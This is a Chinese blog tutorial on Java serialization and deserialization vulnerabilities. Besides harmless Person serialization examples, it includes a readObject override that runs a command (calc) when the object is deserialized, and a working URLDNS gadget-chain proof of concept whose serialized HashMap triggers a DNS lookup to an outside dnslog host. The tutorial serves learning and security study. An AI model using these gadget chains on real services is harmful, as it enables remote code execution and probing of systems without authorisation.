java反序列化基础

最新推荐文章于 2024-04-30 14:07:22 发布
最新推荐文章于 2024-04-30 14:07:22 发布
阅读量490 收藏
点赞数
分类专栏: java基础学习 文章标签: java 学习 jvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/127829021
版权

文章目录

前言

因为之前学过php反序列化,所以对于反序列化的概念还是有了解的,现在学一下java反序列化和php反序列化有什么不同。

1.序列化与反序列化

1.1序列化和反序列化是什么

(1). Java序列化就是指把Java对象转换为字节序列的过程。

(2).Java反序列化就是指把字节序列恢复为Java对象的过程。

1.2序列化和反序列化用什么作用

在传递和保存对象时.保证对象的完整性和可传递性。对象转换为有序字节流,以便在网络上传输或者保存在本地文件中。

反序列化的最重要的作用:根据字节流中保存的对象状态及描述信息,通过反序列化重建对象。

核心作用就是对象状态的保存和重建。

1.3序列化的好处

和php序列化一样,当用户在向服务端传输数据时,这个数据仅仅会存在这一瞬间,如何将想要传输的数据持久的保存下来?

这就要用到反序列化了,反序列化能够实现数据的持久化,通过序列化可以把数据永久的保存在硬盘上,也可以理解为通过序列化将数据保存在文件中,并且利用序列化实现远程通信,在网络上传送对象的字节序列。

2.序列化与反序列化代码实现

只有实现了 SerializableExternalizable 接口的类的对象才能被序列化和反序列化。

  • java.io.ObjectOutputStream 代表对象输出流,它的 writeObject() 方法可对参数指定的对象进行序列化,把得到的字节序列写到一个目标输出流中
  • java.io.ObjectInputStream 代表对象输入流,它的 readObject() 方法从一个源输入流中读取字节序列,再把它们反序列化为一个对象,并将其返回

Person.java


import java.io.Serializable;

public class Person implements Serializable {

    private String name;
    private int age;
    public Person(){
    }
    public Person(String name, int age){
        this.name = name;
        this.age = age;
    }
    @Override
    public String toString(){
        return "My name's " + name +"\nI am " + age +" old";
    }
}

SerializationTest.java


import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutput;
import java.io.ObjectOutputStream;

public class SerializationTest {
    public static void serialize(Object obj) throws IOException{
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }

    public static void main(String[] args) throws Exception{
        Person person = new Person("f0njl",22);
        System.out.println(person);
        serialize(person);
    }
}

UnserializeTest.java



import java.io.FileInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;

public class UnserializeTest {
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }

    public static void main(String[] args) throws Exception{
        Person person = (Person)unserialize("ser.bin");
        System.out.println(person);
    }
}

序列化运行结果:

可以发现,当序列化的时候,执行了Person类中的toString函数,想一下为什么。

例如System.out.println(xx),括号里面的“xx”如果不是String类型的话,就自动调用该类的toString()方法,和php中的toString方法非常相似。

对象序列化包括如下步骤:

  1. 创建一个对象输出流,它可以包装一个其他类型的目标输出流,如文件输出流
  2. 通过对象输出流的 writeObject() 方法将对象进行序列化

对象反序列化的步骤如下:

  1. 创建一个对象输入流,它可以包装一个其他类型的源输入流,如文件输入流
  2. 通过对象输入流的 readObject() 方法将字节序列反序列化为对象

3.反序列化漏洞浅析及其类型

Java提供了可选的自定义序列化。通过重写writeObject与readObject方法,从而达到自己的恶意预期行为,包括命令执行,甚至 getshell 等等。

(1) 入口类的 readObject 直接调用危险方法

首先我们来尝试一下重写readobject方法来达到命令执行的效果。


import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;

public class Person implements Serializable {

    private String name;
    private int age;
    public Person(){
    }
    public Person(String name, int age){
        this.name = name;
        this.age = age;
    }
    @Override
    public String toString(){
        return "My name's " + name +"\nI am " + age +" old";
    }

    private void readObject(ObjectInputStream ois) throws Exception,ClassCastException{
        ois.defaultReadObject();
        Runtime.getRuntime().exec("calc");
    }
}

先将Person序列化,然后再发序列化,会发现弹出了一个计算器。

如果目标类中没有定义私有的writeObject或readObject方法,那么序列化和反序列化的时候将调用默认的方法来根据目标类中的属性来进行序列化和反序列化,而如果目标类中定义了私有的writeObject或readObject方法,那么序列化和反序列化的时候将调用目标类指定的writeObject或readObject方法来实现,我们在目标类中重写了readObject,所以当反序列化时,会进入readObject进而执行命令。

(2) 入口参数中包含可控类,该类有危险方法,readObject 时调用。

(3) 入口类参数中包含可控类,该类又调用其他有危险方法的类,readObject 时调用。

(4) 构造函数/静态代码块等类加载时隐式执行。

(2) 、(3)中的情况和php反序列化类似,java反序列化漏洞也是由一个入口开始向目标类跳转。

4. 产生漏洞的攻击路线

攻击前提:继承 Serializable

入口类:source (重写 readObject 调用常见的函数;参数类型宽泛,比如可以传入一个类作为参数;最好 jdk 自带)

找到入口类之后要找调用链 gadget chain 相同名称、相同类型

执行类 sink (RCE SSRF 写文件等等)比如 exec 这种函数

5.URLDNS链子理解

首先,每一个链子的起点应该都是能够被序列化的类方法。

下边是大师傅们的利用连

Gadget Chain:
	HashMap.readObject()
		HashMap.putVal()
			HashMap.hash()
				URL.hashCode()

跟一下。

首先可以看到HashMap继承了Serializable接口,在HashMap.java中找到readObject函数。

发现了链子中的Hash.putVal,在putval中又可以调用hash方法。

然后如果key不为空,那末会调用key中的hashCode方法。

然后就是在URL中找到了hashCode方法。

如果hashCode等于-1,会到handler.hashCode。跟进hashCode。

到了URLStreamHandler中的hashCode方法。

URLStreamHandler中的hashCode方法有一个getHostAddress,然后就u.getHostAddress,一次dns解析。

注意:jdk版本过高会报错。

SerializationTest.java


import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutput;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;


public class SerializationTest {
    public static void serialize(Object obj) throws IOException{
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("feng.bin"));
        oos.writeObject(obj);
    }

    public static void main(String[] args) throws Exception {
        Person person = new Person("aa", 22);
        HashMap<URL, Integer> hashmap = new HashMap<URL, Integer>();
        // 这里不要发起请求
        URL url = new URL("http://q6filp.dnslog.cn");
        Class c = url.getClass();
        Field hashcodefile = c.getDeclaredField("hashCode");
        hashcodefile.setAccessible(true);
        hashcodefile.set(url, 1234);
        hashmap.put(url, 1);
        hashcodefile.set(url, -1);
        serialize(hashmap);
    }
}

然后进行序列化和反序列化即可。

image-20221113100128564

成功触发dns解析。

总结

java反序列化过程是先把文件序列化写入一个bin文件内,然后又在其他位置进行反序列化,入口函数一般为readObject。

一般都会去找jdk自带的公共库文件及库函数,然后进行文件之间的跳转,直到达到自己的目的为止。

f0njl
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
JAVA序列基础代码
07-08
JAVA序列基础代码
S01-java序列基础知识总结1
08-03
了解Java序列基础知识有助于深入理解类加载机制,特别是在安全性、自定义类加载和内存管理方面。下面我们将详细讨论Java的类加载过程以及如何利用自定义类加载器实现序列。 1. **类加载流程**: - 当...
Java序列序列(详解)
qq_62414755的博客
07-20 3万+
java序列及可序列讲解,代码清晰易懂。
java序列序列详解及示例
热门推荐
alanchanchn的专栏
06-14 4万+
对于序列接口Serializable接口是一个标识接口,它的主要作用就是标识这个对象是可序列的,jre对象在传输对象的时候会进行相关的封装。类 ObjectInputStream 和 ObjectOutputStream 是高层次的数据流,它们包含序列序列对象的方法。上面的方法序列一个对象,并将它发送到输出流。该方法从流中取出下一个对象,并将对象序列。它的返回值为Object,因此,你需要将它转换成合适的数据类型。
java序列序列详解_java序列序列,不吃透都对不起自己
2401_84166536的博客
04-09 731
serialVersionUID - 0x0e 76 fa 9f 59 73 be c6 是16进制转换为二进制,就是生成的值在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。
Java序列
buffedon的博客
09-05 4077
Java序列Java序列概念漏洞原理漏洞危害漏洞出现点漏洞挖掘漏洞防御序列序列代码参考文章 Java序列概念 在说序列之前,先说说序列 序列就是将对象转为字节流,利于存储和被引用 序列序列恰恰相,是将字节流转为对象 序列的格式:json序列,xml序列,二进制序列,SOAP序列 序列调用的函数 序列java.io.ObjectOutputStream 类中的 writeObject() 实现 Serializable 和 Externaliz
java序列序列详解
pyth0zn的博客
05-01 2869
serialVersionUID - 0x0e 76 fa 9f 59 73 be c6 是16进制转换为二进制,就是生成的值transient修饰的变量不能被序列;transient只作用于实现 Serializable 接口;transient只能用来修饰普通成员变量字段;不管有没有 transient 修饰,静态变量都不能被序列
Java-序列序列
yueerba126的博客
07-11 850
序列序列是开发过程中不可或缺的一步,简单来说,序列是将对象转换成字节流的过程,而序列的是将字节流恢复成对象的过程。为了防止子类被序列,我们需要实现writeObject()并readObject()在序列序列期间由JVM执行的方法以及这些方法抛出NotSerializableException。我们还可以在这些方法中提供自定义逻辑,这些逻辑将在序列/去角质素。int i = 10;int j =20;//实现writeObject方法,
深入理解Java对象的序列序列的应用
09-05
总的来说,Java对象的序列序列是数据持久和网络通信的基础,它允许程序在不同时间、不同地点之间交换和恢复对象的状态。通过实现`Serializable`接口,开发者可以轻松地将对象转换为字节流,以便在硬盘或...
Java实现序列序列的简单示例
09-02
2. Java序列序列序列的逆过程,即将字节流恢复为原来的Java对象。在示例中,我们使用`ObjectInputStream`从文件中读取字节流并将其转换回`Person`对象: ```java ObjectInputStream ois = new ...
Java序列序列三种格式存取
12-22
序列机制在Java中有着广泛的应用,EJB、RMI等技术都是以此为基础的。  正确使用序列机制  一般而言,要使得一个类可以序列,只需简单实现java.io.Serializable接口即可(还要实现无参数的构造方法)。该...
Java序列以及序列详解
ks_1998的博客
04-07 4841
Java序列以及序列详解
Java序列漏洞
MRS_jianai的博客
02-19 686
Java序列源码复现
Java 安全之序列漏洞
hl1293348082的专栏
03-30 7951
1.序列序列序列序列对于 Java 程序员来说,应该不算陌生了,序列序列简单来说就是 Java 对象与数据之间的相互转。 那么对于完全面向对象的 Java 语言来说为什么要有序列机制? 实质上,序列机制并不只局限于 Java 语言,序列的本质是内存对象到数据流的一种转换,我们知道内存中的东西不具备持久性,但有些场景却需要将对象持久保存或传输。例如缓存系统中存储了用户的 Session,如果缓存系统直接下线,带系统重启后用户就需要重新登陆,为了使缓存系统内存中的 S
JAVA序列基础
qq_44029310的博客
08-05 938
本文包括:java序列序列基础知识和案例演示,案例包括转为文件字符输出流并保存成文件的方式和通过ByteArrayOutputStream保存为字节数组的方式进行序列序列,使用Binary工具查看序列后的文件和数据含义解释。......
java序列序列基础学习
最新发布
dayouzi的博客
04-30 871
(1)Java序列是指把Java对象转换为字节序列的过程,而Java序列是指把字节序列恢复为Java对象的过程;(2)**序列:**对象序列的最主要的用处就是在传递和保存对象的时候,保证对象的完整性和可传递性。序列是把对象转换成有序字节流,以便在网络上传输或者保存在本地文件中。序列后的字节流保存了Java对象的状态以及相关的描述信息。序列机制的核心作用就是对象状态的保存与重建。
Java中的序列序列(一)
欧阳方超的专栏
04-21 719
所以,为了避免序列失败,为序列类新增属性时,建议不要修改 serialVersionUID 字段的值,当然如果完全不兼容升级,避免序列混乱,那么请修改 serialVersionUID 值。关于序列序列还有很多其他内容,我们择日继续。下回见。
JAVA序列
不知名佳佳的博客
12-20 420
1.利用序列漏洞将程序运行的对象以二进制形式储存在文件系统中,在另一个程序中对序列后的对象状态数据,进行序列恢复对象,可以实现多平台通信,对象持久存储。位置:java .io.Object Output Stream java.io.Object Input stream。白盒测试又分为(函数点)Object Input stream.read Object。序列:Object Input stream --> read Object()3.检测可以分为黑盒检测和白盒检测。
Java序列序列
qq_44885775的博客
04-25 6912
java序列序列知识点
json序列序列
08-31
以上就是JSON序列序列基础用法。需要注意的是,JSON格式的字符串必须使用双引号,而不能使用单引号。 ### 回答2: JSON序列指将数据结构或对象转为JSON字符串的过程。在序列过程中,Python的数据...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值